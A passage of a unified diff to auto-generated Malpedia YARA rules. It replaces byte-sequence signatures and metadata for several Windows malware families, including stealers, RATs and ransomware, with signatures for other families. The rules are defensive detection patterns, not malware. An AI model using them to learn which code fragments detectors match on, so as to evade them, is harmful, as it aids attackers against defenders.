"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.usbferry_auto.yar#L1-L169" license_url = "N/A" - logic_hash = "2d34f8359c26dd7b822a9bcedc09c50858c69dbe831cef14ec0430298405abb3" + logic_hash = "886d5513793c468df6b8e0477647a179848882846be144ad6058e6cfbd13a26d" score = 75 quality = 75 tags = "FILE" @@ -167604,32 +170467,38 @@ rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 a5 ff512c 85c0 756c } - $sequence_1 = { a5 50 a5 ff512c 85c0 756c } - $sequence_2 = { 7406 8b08 50 ff511c } - $sequence_3 = { a5 ff512c 85c0 756c } - $sequence_4 = { 6a00 8bf8 8d45fc 50 57 6a01 56 } - $sequence_5 = { 51 56 57 ff7508 ff15???????? 8bf0 56 } - $sequence_6 = { 52 50 ff91f0000000 85c0 7813 } - $sequence_7 = { 6a00 6a00 8bf8 8d45fc 50 57 } - $sequence_8 = { 57 6a01 56 ff7508 8975fc } - $sequence_9 = { 8b08 50 ff11 85c0 7527 } + $sequence_0 = { 52 8b45e0 50 ff15???????? 85c0 742c } + $sequence_1 = { 8b9598f5ffff 2b9588f5ffff 8b8588f5ffff 89857cf5ffff 899578f5ffff } + $sequence_2 = { e9???????? ff75e0 a1???????? ff5060 8d45e0 } + $sequence_3 = { c3 3b0d???????? f27502 f2c3 f2e960030000 55 } + $sequence_4 = { 8b525c e8???????? 8b15???????? 8b4d84 ff7210 89425c } + $sequence_5 = { 803f2e 7402 33ff 85ff 7407 8d45e9 } + $sequence_6 = { c645df6f c645e06e c645e100 c685a4f5ffff00 68ff030000 } + $sequence_7 = { 2b858cf5ffff 8b8d8cf5ffff 898d84f5ffff 898580f5ffff 8d95a8feffff 83c2ff } + $sequence_8 = { 8b7d0c 33db 895ddc c745e000040000 895dfc 8d45dc } + $sequence_9 = { 89814c010000 8b09 e8???????? 8b0d???????? ff7110 8b9154010000 } + $sequence_10 = { ff7110 8b517c 894178 8b09 e8???????? 8b0d???????? } + $sequence_11 = { 8a460e 8bcf 8845fb 8d45fb } + $sequence_12 = { 33c5 8945fc c685fcfffeff00 68ffff0000 } + $sequence_13 = { 8885a0f5ffff 838590f5ffff01 80bda0f5ffff00 75e1 } + $sequence_14 = { 0f2805???????? 0f1145c8 6a00 0f2805???????? 0f1145d8 50 } + $sequence_15 = { 50 8d45f0 64a300000000 c745e000000000 c745fc00000000 837d2000 } condition: - 7 of them and filesize <155648 + 7 of them and filesize <638976 } -rule MALPEDIA_Win_Kins_Auto : FILE +rule MALPEDIA_Win_Kazuar_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4907ff1e-c41f-5c86-b473-4fc349042db0" + id = "bbccb83c-4401-524c-a829-9e1fecf876f5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kins_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.kazuar_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "f9718717a3f75dea9d210a3bb9fec1b2557a6447053917656440c5e0062c5092" + logic_hash = "8a42fd36e815cd90ae38c5e050f60bebec4410e7ad562404ae7ac137541dd601" score = 75 quality = 75 tags = "FILE" @@ -167643,32 +170512,32 @@ rule MALPEDIA_Win_Kins_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e9???????? 8d45dc 8d75cc e8???????? 83f8ff 741f 8bc6 } - $sequence_1 = { 8bfe 337dfc 23f8 33fe 037df0 8d9417937198fd 8b7dfc } - $sequence_2 = { e8???????? 83f8ff 743d 47 3bfa } - $sequence_3 = { f7d3 0bde 33d8 035df4 8dbc3ba72394ab c1c70f 8bd8 } - $sequence_4 = { c1e008 0bc2 0fb65116 0fb64917 c1e008 0bc2 } - $sequence_5 = { 0fb6c0 83e07f 8bf2 746f 0fb61c39 c1e608 48 } - $sequence_6 = { 40 85f6 75d8 8b7510 3b16 7719 } - $sequence_7 = { 33de 23df 33da 035908 8d840378a46ad7 c1c007 03c7 } - $sequence_8 = { 8d8578fcffff 50 8d857cfdffff 50 } - $sequence_9 = { ff4118 8b4118 83f838 762b eb0b c644081c00 } + $sequence_0 = { e8???????? 3d88ae6393 7506 498b4310 eb0f } + $sequence_1 = { e8???????? 4c8d4c2428 31d2 31c9 01c0 4c89442438 6689442430 } + $sequence_2 = { 8d8b80030000 894c240c 8d8b00030000 894c2408 8d4b08 894c2404 } + $sequence_3 = { 740a 81ea00204000 01d0 eb02 31c0 5d c3 } + $sequence_4 = { 7452 83b98c00000000 7449 4c01de } + $sequence_5 = { 8b45dc 8b10 890424 ff520c 85c0 52 } + $sequence_6 = { 8b461c 498d1493 8b0402 4c01d8 } + $sequence_7 = { 8bb188000000 85f6 7452 83b98c00000000 7449 4c01de 31db } + $sequence_8 = { 89d7 7463 4863493c 4c01d9 8bb188000000 85f6 7452 } + $sequence_9 = { 890424 894c2410 8d8b80030000 894c240c 8d8b00030000 } condition: - 7 of them and filesize <548864 + 7 of them and filesize <81920 } -rule MALPEDIA_Win_Unidentified_053_Auto : FILE +rule MALPEDIA_Win_Acridrain_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b8635dce-dc5b-565f-a079-d654a222f110" + id = "82271a88-0572-5daa-a06b-4b68b32ae23f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_053_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acridrain_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "466de537792d4c8cf5922d9a48018d257023e4a1753f3d834debb6d43be45c35" + logic_hash = "2ef6b9a2838948e7218bd1e79fe0257da485657bd990a4bc6b62c314342a8e67" score = 75 quality = 75 tags = "FILE" @@ -167682,32 +170551,32 @@ rule MALPEDIA_Win_Unidentified_053_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 753c ff75e4 68???????? e8???????? 85c0 59 } - $sequence_1 = { c1c603 81ea584dff93 8915???????? e8???????? 42 } - $sequence_2 = { 8d3c85a8914100 833f00 bb00100000 7520 53 e8???????? } - $sequence_3 = { ff75f0 50 ff91c4010000 8945f4 85c0 } - $sequence_4 = { f7d7 c1c30e ffd0 890d???????? 87c7 2bc3 f7da } - $sequence_5 = { f7db c1c017 e8???????? f7d1 } - $sequence_6 = { 03f7 46 f7d8 81ebd4b243e9 c1c80c } - $sequence_7 = { 3b8e50894100 0f8515010000 a1???????? 83f801 0f84df000000 3bc2 } - $sequence_8 = { 81f669d8509c f7d2 686c6c6f63 e8???????? 4e 03c1 890d???????? } - $sequence_9 = { 8b048588814100 234508 8b4e14 8d04c1 0fb64801 8b5004 83fa10 } + $sequence_0 = { eb03 8b4dd0 8b45e0 8b55cc 8945cc 8a45f0 8955e0 } + $sequence_1 = { ff76a4 53 e8???????? 83c428 8945dc e9???????? 6a00 } + $sequence_2 = { ffd0 8b75f0 8bc8 83c414 85c9 0f85c5000000 0fce } + $sequence_3 = { eb0c 8b4d9c 83c104 894d9c 8b41fc 8945a0 8bc8 } + $sequence_4 = { eb5d 8b03 8b8890860000 803900 7520 8d442414 6801040000 } + $sequence_5 = { 8b8520ffffff 33ff 8b10 85d2 0f8ea6000000 33c9 898d50ffffff } + $sequence_6 = { f6459c01 0f84ae0b0000 8bc6 83e007 3bf0 0f83d50a0000 e9???????? } + $sequence_7 = { 8b4748 56 ffd0 8b7584 83c410 8bbd78ffffff eb09 } + $sequence_8 = { ffb5d0fdffff e8???????? 83c408 8985d4fdffff 85c0 0f85844b0000 ffb5d0fdffff } + $sequence_9 = { e9???????? 83fe02 750c c7872005000003000000 eb7b c7872005000000000000 83fe03 } condition: - 7 of them and filesize <294912 + 7 of them and filesize <2244608 } -rule MALPEDIA_Win_Tildeb_Auto : FILE +rule MALPEDIA_Win_Astralocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e4d2b91f-a0b2-5435-bc42-03da5ff53194" + id = "0d5879c8-ffd6-54eb-8701-3a0bd5bd2437" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tildeb_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.astralocker_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "5eed583e8de669a9ccc3c14def00c8dc34c80dd8549b8a02a48ebd34aae4a3b5" + logic_hash = "04cf0865e55d3f7d37324f7ff4a5b3ef42183f756ec3ed69d17a248a6814ecfc" score = 75 quality = 75 tags = "FILE" @@ -167721,32 +170590,32 @@ rule MALPEDIA_Win_Tildeb_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d4dbc 51 56 ff15???????? 56 ff15???????? } - $sequence_1 = { 6a00 6a00 ff15???????? 85c0 0f84f5090000 68???????? } - $sequence_2 = { 57 6a40 c644241300 ff15???????? 50 ff15???????? } - $sequence_3 = { 85c0 7445 50 68???????? 68???????? ff15???????? 83c40c } - $sequence_4 = { e8???????? 6a00 6a08 8d85d4f5ffff 50 } - $sequence_5 = { 68???????? 57 56 ff15???????? 8945bc 85c0 7457 } - $sequence_6 = { c3 b815000000 5e 81c494010000 c3 f7d8 5e } - $sequence_7 = { eb40 8d458c 50 68???????? eb35 } - $sequence_8 = { 53 55 8bac2410010000 56 8b35???????? 57 68???????? } - $sequence_9 = { 6800000088 68???????? 68???????? 6a00 ff15???????? 8b0d???????? } + $sequence_0 = { 8b5508 8b440a04 50 8b0c0a 51 e8???????? } + $sequence_1 = { 83c102 894dfc 837dfc0a 0f83dc000000 8b55fc 8b4508 } + $sequence_2 = { 6bc20a 8b4d08 33d2 33f6 891401 } + $sequence_3 = { 6bc20a 8b4d08 33d2 33f6 } + $sequence_4 = { 8b440a04 50 8b0c0a 51 e8???????? 83c408 8945ec } + $sequence_5 = { 894dfc 837dfc0a 0f83dc000000 8b55fc 8b4508 8b4cd004 } + $sequence_6 = { 8b4508 8b4cd004 51 8b14d0 52 e8???????? } + $sequence_7 = { 33c0 33f6 89040a 89740a04 } + $sequence_8 = { ba08000000 6bc20a 8b4d08 33d2 33f6 891401 89740104 } + $sequence_9 = { 33c0 33f6 89040a 89740a04 c745fc00000000 eb09 } condition: - 7 of them and filesize <8532488 + 7 of them and filesize <191488 } -rule MALPEDIA_Win_Lockfile_Auto : FILE +rule MALPEDIA_Win_Corebot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "544691b3-5a18-5d07-a020-f938e5dff9ba" + id = "690f2e96-0cf9-536c-962e-128a98cf1d0b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lockfile_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.corebot_auto.yar#L1-L167" license_url = "N/A" - logic_hash = "dc414bc646e8b114a7dca14d5155afbe9c4203cc45e95fbd463e125e3eb42e08" + logic_hash = "f317e1a133d092285e381a2c4a6a16830d0d7cb17eced179ceadea1ad59e039d" score = 75 quality = 75 tags = "FILE" @@ -167760,32 +170629,38 @@ rule MALPEDIA_Win_Lockfile_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 418bdc 33d9 8bcb 4123cf 4133cc 03d1 8955bb } - $sequence_1 = { 488b4b58 49894a48 488b5360 49895250 48837b6010 7731 41c6424101 } - $sequence_2 = { 488bf1 33d2 e8???????? 33d2 48895618 48895620 } - $sequence_3 = { e9???????? 4c8d4c245c 4c8d4570 488d15b31e0600 488d8d70020000 e8???????? 488d8d70020000 } - $sequence_4 = { 85c0 7411 836530fe 488b4d38 4883c178 e8???????? } - $sequence_5 = { 57 4883ec20 8bfa 488bd9 488b4908 4885c9 740b } - $sequence_6 = { 0f845c010000 83792801 0f8552010000 e8???????? 8bd8 483bde 480f42de } - $sequence_7 = { 0f84a5000000 488b0d???????? 488b15???????? 4c3bc1 750d 488bc1 48d1e8 } - $sequence_8 = { 41c1c802 4123cb 418bd1 0bc8 c1c205 03cd 418bc0 } - $sequence_9 = { 88458c 8b4580 0409 3465 88458d 8b4580 040a } + $sequence_0 = { 31c0 5e 5d c20800 55 89e5 } + $sequence_1 = { 01f3 8b75ec 56 8945f0 } + $sequence_2 = { 0fb618 895de8 c745ec07000000 8d141b 84db 8955e8 } + $sequence_3 = { 50 e8???????? 83c404 29f7 } + $sequence_4 = { 51 ff15???????? 85c0 0f95c0 eb08 c70600000000 } + $sequence_5 = { 31f6 8955e8 894dec 43 8b4dec 8d55f0 } + $sequence_6 = { 31f6 46 8918 89f0 83c40c 5e 5f } + $sequence_7 = { 43 8b4dec 8d55f0 e8???????? 85db 7827 } + $sequence_8 = { e8???????? 807e5800 7509 ff7654 ff15???????? 807e5000 7509 } + $sequence_9 = { eb10 6800800000 6a00 56 } + $sequence_10 = { 85c0 7515 8b4624 3b4620 } + $sequence_11 = { ff7010 ff7014 e8???????? 8b45e0 } + $sequence_12 = { ff15???????? 8d4634 50 ff15???????? 8d4e0c e8???????? } + $sequence_13 = { ff15???????? 807e5000 7509 ff764c ff15???????? 8d4634 50 } + $sequence_14 = { ff742428 e8???????? 8b442424 8d4c2410 } + $sequence_15 = { 85ff 740f 57 ff7508 } condition: - 7 of them and filesize <1163264 + 7 of them and filesize <1302528 } -rule MALPEDIA_Win_Penco_Auto : FILE +rule MALPEDIA_Win_Bouncer_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0506b7c6-0597-5673-b29d-0e2e4b0bbb8c" + id = "87d70146-e2c3-5ac4-84a7-b98c5e250ffd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.penco_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bouncer" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bouncer_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "b907c123e9f48e051972fa4ccfde76e3114fafc16984b4ff739806928ca43da4" + logic_hash = "5df724a9e6c42e3be58b79859bcd4fd49abf6f303058e1f4cc9822918e05c24a" score = 75 quality = 75 tags = "FILE" @@ -167799,34 +170674,34 @@ rule MALPEDIA_Win_Penco_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 6a01 6800000080 8d9500010000 52 8b1d???????? } - $sequence_1 = { 3334bd00d83400 0fb67c2414 3334bd00d43400 8b4c241c 33700c 83c010 8bde } - $sequence_2 = { 40 89442418 3b442414 0f82fffeffff eb13 8d042e 68???????? } - $sequence_3 = { 741c 68???????? 68ff010f00 56 ff15???????? 56 85c0 } - $sequence_4 = { 0fbe80e8983400 83e00f 33f6 eb04 33f6 33c0 } - $sequence_5 = { 8d4598 50 6a00 6a00 8d4db8 51 8b55a4 } - $sequence_6 = { 33c0 84c9 7428 8d642400 80f930 7c1c 80f939 } - $sequence_7 = { 894c2418 8b4c2444 f7f1 33d2 c744242001000000 03442410 89442414 } - $sequence_8 = { 7504 8bf0 eb3e 6a0a } - $sequence_9 = { 8b349528e83400 8b542428 0fb6f9 3334bd00d83400 8b4c241c c1ea18 33349528ec3400 } + $sequence_0 = { 53 be???????? 83ec34 6a0d 59 8bfc } + $sequence_1 = { a1???????? 56 3bc3 7422 } + $sequence_2 = { 8dbda6f8ffff 33f6 f3ab 66ab 6a1e 8d45a8 56 } + $sequence_3 = { e8???????? 83c414 397e18 0f85ce020000 3bc3 7d50 33c9 } + $sequence_4 = { 3bc3 0f84870e0000 50 ff15???????? } + $sequence_5 = { 8bec 81ec14040000 53 56 57 6a40 ff15???????? } + $sequence_6 = { 8d8534ffffff 57 50 e9???????? } + $sequence_7 = { 56 be???????? 57 56 e8???????? 8bd8 c7042499050000 } + $sequence_8 = { 8945d0 0f8e740e0000 8d85a0fcffff 50 ff75fc e8???????? } + $sequence_9 = { 897db0 8975c4 ff750c 8975bc 8975c0 } condition: - 7 of them and filesize <319488 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Diztakun_Auto : FILE +rule MALPEDIA_Win_Maze_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7edd86e4-2270-51c2-83a8-ad0918813862" + id = "107fc7f0-df43-5a49-b2af-87c958bef91f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.diztakun_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maze_auto.yar#L1-L201" license_url = "N/A" - logic_hash = "6061dd34695b43b9aac4a4105a7b2b736c3a3c9564c659ddb77165c4b09e4e8b" + logic_hash = "114687adcaa31dee32acfd0d8a276547892002fc6701cc69c1544ebdb3b57221" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -167838,34 +170713,43 @@ rule MALPEDIA_Win_Diztakun_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4a 85d2 0f8fb3010000 8b08 8b11 50 } - $sequence_1 = { 51 ff15???????? 8d742408 e8???????? 5f } - $sequence_2 = { 8b08 8b11 50 8b4204 ffd0 c68424d807000019 8b442430 } - $sequence_3 = { 83e01f c1f905 8b0c8d60d74400 c1e006 03c1 f6400401 7524 } - $sequence_4 = { 8945f4 8b4514 40 c745ec3f344200 894df8 } - $sequence_5 = { 50 889c24e4070000 e8???????? 83c40c c68424d807000011 } - $sequence_6 = { 8b4c240c 8b5720 8d442408 50 51 } - $sequence_7 = { 85d2 740b 8b450c 8b80a4914400 eb09 8b450c 8b8070914400 } - $sequence_8 = { e8???????? 59 59 85c0 0f84d9000000 68???????? 53 } - $sequence_9 = { e8???????? 83bfac00000000 755e 8d4c2474 51 8d54241c 52 } + $sequence_0 = { 53 57 56 83ec10 8b4510 8b4d0c } + $sequence_1 = { 8945f0 c745f000000000 8b45f0 83c410 5e 5f } + $sequence_2 = { 60 8b7d08 8b4d10 8b450c f3aa 61 8945f0 } + $sequence_3 = { 83ec10 8b4510 8b4d0c 8b5508 837d0800 8945ec } + $sequence_4 = { 8945ec 894de8 8955e4 7509 c745f000000000 eb17 60 } + $sequence_5 = { 89c8 0500000001 83d200 89d7 } + $sequence_6 = { 89c7 e8???????? 83c40c 57 55 8dbc24f4000000 } + $sequence_7 = { 89c8 01d6 ba53c6f0ff f7e2 } + $sequence_8 = { 41 41 41 41 41 41 41 } + $sequence_9 = { 83ec20 56 be???????? 56 6a00 6801001200 } + $sequence_10 = { 8d45ec 56 8945f8 6a00 8d45f4 50 c745f40c000000 } + $sequence_11 = { b904000000 6bd109 8b4d08 8b941100100000 c1ea0a } + $sequence_12 = { b948040000 b8cccccccc f3ab a1???????? 33c5 8945ec 50 } + $sequence_13 = { 898d6cfeffff 8b4dfc 8b5508 8b848a10080000 } + $sequence_14 = { 8b8c1040100000 c1e10a ba04000000 c1e200 8b4508 8b941040100000 c1ea16 } + $sequence_15 = { 899594fdffff 8b8d9cfdffff 338d98fdffff 038d94fdffff 8b55fc } + $sequence_16 = { 8b54813c c1e209 8b45fc 8b4d08 8b44813c } + $sequence_17 = { 8985e4feffff 8b45fc 8b4d08 8b548134 } + $sequence_18 = { 8b4dfc 8b5508 8b848a1c080000 c1e017 8b4dfc 8b5508 8b8c8a1c080000 } condition: - 7 of them and filesize <688128 + 7 of them and filesize <2318336 } -rule MALPEDIA_Win_Nymaim_Auto : FILE +rule MALPEDIA_Win_Breach_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6fe09b40-4e7e-5960-9e2c-823057d831db" + id = "f70ab09f-8643-5192-b966-55a3dab88920" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nymaim_auto.yar#L1-L281" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.breach_rat_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "0c0c73586cb65f92c931bae46a77127eb659bbbab03ac07a837f2712a17a227b" + logic_hash = "8cb7f4b75bac273a3c54152da1b9e63a78dde17954dfd874b266899e47404327" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -167877,51 +170761,32 @@ rule MALPEDIA_Win_Nymaim_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 89d8 01c8 31d2 f7f7 } - $sequence_1 = { 0f94c1 09c8 6bc064 09c0 } - $sequence_2 = { 31d2 f7f7 92 31d2 } - $sequence_3 = { 92 31d2 bf64000000 f7f7 } - $sequence_4 = { c1e105 01c8 c1c307 30c3 } - $sequence_5 = { 31c9 38f0 83d100 38d0 83d900 c1e105 } - $sequence_6 = { c1eb13 331d???????? 31c3 c1e808 } - $sequence_7 = { 00d3 8a16 301e 46 01fb } - $sequence_8 = { 8b12 8b4d0c 8b5d18 8b1b 4f 31c0 fec2 } - $sequence_9 = { 8b4e08 014e04 8b5e0c 015e08 } - $sequence_10 = { c1e808 31c3 895e0c 89d8 } - $sequence_11 = { f7e0 0fc8 01d0 894704 } - $sequence_12 = { 8b06 c1e00b 3306 8b5604 0116 8b4e08 014e04 } - $sequence_13 = { 53 56 57 83ec44 8b4508 8d0d2030d201 } - $sequence_14 = { 4409df 4531d0 813d????????7147ed3a 0f84c06efdff 4421da 4431c7 c1c703 } - $sequence_15 = { 0f84e0bffcff 443b642460 72b4 85ff 7439 837c246000 7628 } - $sequence_16 = { 4531c9 488d442440 813d????????00e8e23a 0f84c1f7feff 31d2 48b9????????00000000 488903 } - $sequence_17 = { 448915???????? 8b4548 89442448 488b8588000000 4889442440 488b8580000000 4889442438 } - $sequence_18 = { 56 83ec28 8b450c 8b4d08 8d154e30d201 } - $sequence_19 = { 55 89e5 83ec10 8b4508 8d0d3430d201 } - $sequence_20 = { 83ec44 8b4508 8d0d2030d201 31d2 890c24 c744240400000000 } - $sequence_21 = { 0f9e05???????? 4c89fa e8???????? 488d542440 488d8da0000000 890d???????? 8805???????? } - $sequence_22 = { 4439a19c000000 0f8456bffcff 4439a194000000 48c705????????b2228979 0f8545bffcff 8b7108 458d6c2401 } - $sequence_23 = { 31ed e8???????? 0fb7542430 488d4c2420 0fb7442432 4189d8 c1e209 } - $sequence_24 = { 5b 5d c3 8b45f0 8b0c850440d201 } - $sequence_25 = { 890424 894c2404 e8???????? 8d0d3430d201 } - $sequence_26 = { 31c9 8b55f4 8b75ec 89723c c7424003000000 } - $sequence_27 = { 4529d8 4489da 4801ca e8???????? 66813d????????a8c1 0f848bbe0000 44295b68 } - $sequence_28 = { 31d2 890c24 c744240400000000 8945f4 8955f0 e8???????? 8d0d8630d201 } + $sequence_0 = { 5e 5b 8be5 5d c20400 884c240f 8d442418 } + $sequence_1 = { 50 8bce e8???????? 8bc8 e8???????? 8d8dacf6ffff c745fcffffffff } + $sequence_2 = { c1e81f 03c2 8985d8feffff 0f8479080000 83c724 89bde0feffff 8d9b00000000 } + $sequence_3 = { c741140f000000 c7411000000000 c60100 e8???????? ff7510 8d4dd4 ff750c } + $sequence_4 = { 8be5 5d c3 68???????? 8bce e8???????? b001 } + $sequence_5 = { 8b5508 8bcb 0fb712 8bff 663910 7408 83c002 } + $sequence_6 = { 42 8b5de0 3bd6 72f2 8b45a4 2bc6 50 } + $sequence_7 = { c7471800010000 8b4df4 8bc7 c7470400000000 c7470800000000 5f 5e } + $sequence_8 = { eb20 84c9 74ed 8b4df0 8d45d8 50 e8???????? } + $sequence_9 = { e8???????? 68???????? 8d859cf4ffff c745fc5c000000 50 8bce e8???????? } condition: - 7 of them and filesize <2375680 + 7 of them and filesize <645120 } -rule MALPEDIA_Win_Strelastealer_Auto : FILE +rule MALPEDIA_Win_Yakuza_Ransomware_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "308b6312-f55e-5e44-8b26-8341d0a5504a" + id = "11a15f28-8d6d-50f2-ab84-992f1017bc03" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.strelastealer_auto.yar#L1-L169" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yakuza_ransomware" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yakuza_ransomware_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "4a18fbcab2ec145e1ed1c3a8aa2118c83ff2631df0db61e9cbe03afa397c02a3" + logic_hash = "f6b4887f1e5f8fb585f51d15a1308ea3aa15725a1e02d02f26222a8f601e98de" score = 75 quality = 75 tags = "FILE" @@ -167935,38 +170800,32 @@ rule MALPEDIA_Win_Strelastealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f85e6030000 6804010000 8d942464010000 53 52 e8???????? } - $sequence_1 = { ff15???????? 8b442434 8b4c2438 53 } - $sequence_2 = { 488945f0 488d15d8a20000 b805000000 894520 } - $sequence_3 = { 885909 b801000000 83c404 51 0fb69220a30010 3011 33d2 } - $sequence_4 = { ff15???????? 33c9 8be8 85db 7612 8bc1 } - $sequence_5 = { 48895c2408 4889742410 57 4c8bd2 488d351b43ffff } - $sequence_6 = { 488d442478 33d2 4889442430 c744242801000000 4c897c2420 } - $sequence_7 = { 488d15eba10000 488d0dc4a10000 e8???????? 488d15e8a10000 488d0dd9a10000 } - $sequence_8 = { 0f85bc030000 8b442414 53 53 53 53 8d54244c } - $sequence_9 = { 740d 488bc8 49878cff20ac0100 eb0a 4d87b4ff20ac0100 33c0 } - $sequence_10 = { 4c8d05c7680100 c744243000020080 488d1548690100 48897c2428 4533c9 } - $sequence_11 = { 53 4883ec20 488d057f740000 488bd9 483bc8 7418 } - $sequence_12 = { 488d3de6070100 eb07 488d3dc5070100 4533ed } - $sequence_13 = { 51 6a00 6a00 6a1a 6a00 ff15???????? 68???????? } - $sequence_14 = { 51 8d94247c040000 52 ff15???????? } - $sequence_15 = { 8b4508 ff34c580b10010 ff15???????? 5d c3 6a0c } + $sequence_0 = { 8bd1 d1ea b8ffffff1f 2bc2 3bc8 7607 8bc3 } + $sequence_1 = { e8???????? 3b780c 730e 8b4008 8b34b8 85f6 0f85d7000000 } + $sequence_2 = { d1f8 837e1408 7202 8b36 50 ff7508 8bce } + $sequence_3 = { 6a01 6a01 57 8d4d80 e8???????? 8b4580 8d4d80 } + $sequence_4 = { 8d7018 83c030 8b11 03c7 50 03f7 56 } + $sequence_5 = { c745fcffffffff 56 8b4de0 41 51 53 8bcf } + $sequence_6 = { 8b4f14 8b5614 85c9 743e 85c0 750d e8???????? } + $sequence_7 = { eb17 0fb74644 8d4e24 50 e8???????? 6a2d 8d4e24 } + $sequence_8 = { 8b06 6a02 51 53 8d8d50ffffff 51 8bce } + $sequence_9 = { c745f000000000 c7461000000000 c7461407000000 668906 8945fc 8bc3 c745f001000000 } condition: - 7 of them and filesize <266240 + 7 of them and filesize <2811904 } -rule MALPEDIA_Win_Backswap_Auto : FILE +rule MALPEDIA_Win_Backconfig_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8b9036c3-1342-5fdd-b202-655dad83c8d1" + id = "18fd149c-ad9b-5433-8651-ac1dcd92de05" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap" - source_url = 